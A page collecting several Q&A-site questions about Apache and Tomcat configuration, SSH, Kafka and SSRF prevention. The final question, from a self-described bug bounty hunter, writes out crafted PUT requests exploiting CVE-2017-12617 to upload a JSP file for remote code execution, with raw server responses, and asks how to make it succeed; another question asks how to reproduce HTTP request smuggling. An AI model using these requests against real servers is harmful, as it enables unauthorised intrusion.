Running PHP echo $_SERVER['DOCUMENT_ROOT']; Shows Apache Default Path

Trying to get set up and running on a new hosting company after the old one announced they are discontinuing their service at the end of the year, I am having difficulty getting the sites to run. I narrowed it down to Apache’s DocumentRoot for each domain showing the Apache default path rather than showing the path to the individual site’s file location. In other words, when I run echo $_SERVER['DOCUMENT_ROOT']; in a test script, it shows the path as /etc/apache2/htdocs when it should show /home/username/public_html/domain.com. They seem unable to fix it, so can DocumentRoot be changed through cPanel for each domain?

Apache redirect .com.ar to .com

We have a website with 2 different domains:

www.example.com or example.com

and www.example.com.ar or example.com.ar

I want all requests redirected to www.example.com.

I know I have to create two virtual hosts in Apache and, in the .htaccess file for the .com.ar site, put the rewrite rule (as explained here: I have domain.com and domain.org to the same site, should I use redirects to avoid duplicate content).

My question is: we have a wildcard SSL certificate for the .com domain. Is it possible to redirect HTTPS requests for www.example.com.ar and example.com.ar to the .com site? Or should I get another SSL certificate for the .com.ar domain?

Protect password from apache user by making file executable-only

I (will) have a binary executable file. Its only permission is user-execute. It cannot be read by user, group, or world. The owner of the file is the Apache user. I don’t want the Apache user to be able to read the file, but I do want the Apache user (via a PHP script) to be able to execute the file.

The binary executable file contains a password that is used to decrypt an SSH private key file, as I need the public key to hash the request body & compare against a hashed signature my server is receiving. The executable binary file will receive the request body & hashed signature, do its stuff, and simply return "yes" or "no" to indicate if the request is valid.

I know my executable binary file could still be accessed by root or sudo. Preventing that would be interesting, but is beyond the scope of my question.

Would this be an effective way to protect the password (which is in the binary file that can ONLY be executed) against PHP scripts running under the Apache user?

Note: I would like to open-source this setup, so I want it to be usable on a variety of Linux servers. I’m personally on a shared server so can’t really configure Apache or the system, and that would be my target audience.

Remove Apache Tomcat on Debian to use Jetty server

I’m a beginner on Linux, and I would like to install wiki software on a server, a virtual machine with Debian 10.

First I began to follow tutorial 1 to install Bluespice 3, a wiki software; the Apache part is OK, then Jetty. After that I installed Apache Tomcat 9 with the help of another tutorial, tutorial 2. Then I realized Jetty has the same functionality (Tomcat 9) and is preferred by tutorial 1.

To get to the point, I want to delete Apache Tomcat to prioritize Jetty, and to keep following tutorial 1. But I didn’t install Tomcat 9 via the command line "apt-get install….", but via the extraction of a tar.gz file, with the creation of a Tomcat group… so I do not know the exact package names of Tomcat 9 to remove it properly. Is there a specific package property of Tomcat 9 to remove it properly?

Otherwise, maybe another solution. When I type http://localhost:8080 in the web browser, the web page is a 404 error with the message: "the origin of the server did not find a current representation for the target ressource or is not willing to disclose that one exits". In the bottom left, it’s written "Apache Tomcat/9.0.37". I think Tomcat has the priority. But in this case I would like the HTML page of Bluespice 3, knowing the Bluespice war file is at the right location in /var/lib/jetty9/webapps. Can I modify the path between localhost and server to give priority to Jetty, without removing Tomcat? Is it possible?

Thanks in advance for your help

Force Apache Server/Tomcat to ignore Transfer-Encoding

I am trying to reproduce HTTP request smuggling using an Apache HTTP Server as a reverse proxy (using mod_proxy) and a Tomcat Server in the back-end.

Is it possible to force either Apache Server or Tomcat to ignore Transfer-Encoding in requests (and only use Content-Length)? Or is request smuggling simply not possible with this configuration?

Using Apache MINA for SSH using signed ssh-rsa-cert-01 from Certification Authority

There is an existing client configured and running (SshClient) using Apache MINA to SSH to one of our internal jump boxes. It currently uses PEM-based authentication. Due to compliance we have to switch to using internally signed certificates (internally we are using HashiCorp Vault as a CA). I’m unable to find any documentation regarding how to use signed certificates for SSH in Apache MINA to start with. Is it not supported? Will I perhaps have to use another Java SSH library?

Kafka source code on github and from the apache website is missing the “org.apache.kafka.common.message.” package? [closed]

I tried downloading the source code of Kafka from GitHub as well as from Apache’s website. I found that both the sources were missing the “org.apache.kafka.common.message.” package. Can anybody kindly let me know why this might be the case?

Kindly note that I had downloaded the source of “AK RELEASE 2.5.0” from Apache’s website. Similarly, I used the “trunk” branch from the current GitHub repository for Kafka.

What measures can I take to prevent Server Side Request Forgery (SSRF) in a JAX-RS Application running on Apache Tomcat?

If I have an application server that uses an implementation of JAX-RS, and is running as a *.war file on an Apache Tomcat server, is there anything special that needs to be done or configured to prevent SSRF attacks?

My naive understanding is that JAX-RS applications are only serving requests to certain URLs and Apache Tomcat only allows requests to certain resources.

If this is handled by default by JAX-RS or Apache Tomcat, could you explain how?

If this is not handled by default by JAX-RS nor Apache Tomcat, could you explain the best way to prevent this type of attack with these tools?

Specific versions:

  • JAX-RS api 2.1
  • Apache Tomcat 9.0.33

Vulnerable Apache Tomcat server

I am a bug bounty hunter. When doing some research, I found a subdomain that is using Apache Tomcat. Speaking of Tomcat, there was a vulnerability found in 2017: CVE-2017-12617.

Any Apache Tomcat server with the PUT request method enabled will allow the attacker to create a JSP file on the server through a crafted request, which will lead to RCE:

    PUT /1.jsp/ HTTP/1.1
    Host: vulnerable.com
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    Referer: http://vulnerable.com/public/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2
    Cookie: JSESSIONID=A27674F21B3308B4D893205FD2E2BF94
    Connection: close
    Content-Length: 26

    <% out.println("hello");%>

And after some testing, I found that the server had the PUT method enabled. But when I sent the exploit request, there was an error:

    PUT /1.jsp/ HTTP/1.1
    Host: vulnerable.com
    Connection: close
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
    Sec-Fetch-Dest: document
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,vi;q=0.8
    Cookie: ...
    If-Modified-Since: Thu, 09 Apr 2020 08:10:10 GMT
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 26

    <% out.println("hello");%>

    HTTP/1.1 500 Internal Server Error
    Server: Apache-Coyote/1.1
    Content-Type: text/html;charset=ISO-8859-1
    Content-Language: en-US
    Content-Length: 389
    Date: Fri, 17 Apr 2020 02:07:24 GMT
    Connection: close

    <html><body><h1>Whitelabel Error Page</h1><p>This application has no explicit mapping for /error, so you are seeing this as a fallback.</p><div id='created'>Fri Apr 17 11:07:24 JST 2020</div><div>There was an unexpected error (type=Internal Server Error, status=500).</div><div>URLDecoder: Illegal hex characters in escape (%) pattern - For input string: &quot; o&quot;</div></body></html>

I found that the error is from the Java URLDecoder. The server may have decoded the content in the body of the request, but the % o is not a valid URL character, so the error occurs. It proves that the server has handled the request; it may work but does not. Then I tried this:

    PUT /1.jsp/ HTTP/1.1
    Host: vulnerable.com
    Connection: close
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
    Sec-Fetch-Dest: document
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,vi;q=0.8
    Cookie: ...
    If-Modified-Since: Thu, 09 Apr 2020 08:10:10 GMT
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 26

    <%25 out.println("hello");%25>

    HTTP/1.1 404 Not Found
    Server: Apache-Coyote/1.1
    Content-Type: text/html;charset=ISO-8859-1
    Content-Language: en-US
    Date: Fri, 17 Apr 2020 02:05:30 GMT
    Connection: close
    Content-Length: 1295

    <!DOCTYPE html>
    <!--
      ~ Copyright (c) 2018 Vulnerable Corporation. All rights reserved.
      ~ Vulnerable Corporation PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
      -->

    <html>
    <head>
      <title>VULNEARBLE</title>
    ...

It gave me back a 404 response. I have tried POST, but it just proves that there is something special about the PUT method:

    POST /1.jsp/ HTTP/1.1
    Host: vulnerable.com
    Connection: close
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
    Sec-Fetch-Dest: document
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,vi;q=0.8
    Cookie: ...
    If-Modified-Since: Thu, 09 Apr 2020 08:10:10 GMT
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 26

    <% out.println("hello");%>

    HTTP/1.1 404 Not Found
    Server: Apache-Coyote/1.1
    Content-Type: text/html;charset=ISO-8859-1
    Content-Language: en-US
    Date: Fri, 17 Apr 2020 02:05:30 GMT
    Connection: close
    Content-Length: 1295

    <!DOCTYPE html>
    <!--
      ~ Copyright (c) 2018 Vulnerable Corporation. All rights reserved.
      ~ Vulnerable Corporation PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
      -->

    <html>
    <head>
      <title>VULNEARBLE</title>
    ...

(The POST request does not even show any error or response.) I have checked for the 1.jsp file, but it hasn’t been created yet:

    GET /1.jsp/ HTTP/1.1
    Host: vulnerable.com
    Connection: close
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
    Sec-Fetch-Dest: document
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,vi;q=0.8
    Cookie: ...
    If-Modified-Since: Thu, 09 Apr 2020 08:10:10 GMT
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 26

    HTTP/1.1 404 Not Found
    Server: Apache-Coyote/1.1
    Content-Type: text/html;charset=ISO-8859-1
    Content-Language: en-US
    Date: Fri, 17 Apr 2020 02:05:30 GMT
    Connection: close
    Content-Length: 1295

    <!DOCTYPE html>
    <!--
      ~ Copyright (c) 2018 Vulnerable Corporation. All rights reserved.
      ~ Vulnerable Corporation PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
      -->

    <html>
    <head>
      <title>VULNEARBLE</title>
    ...

Does anyone know what is happening and what I should do next?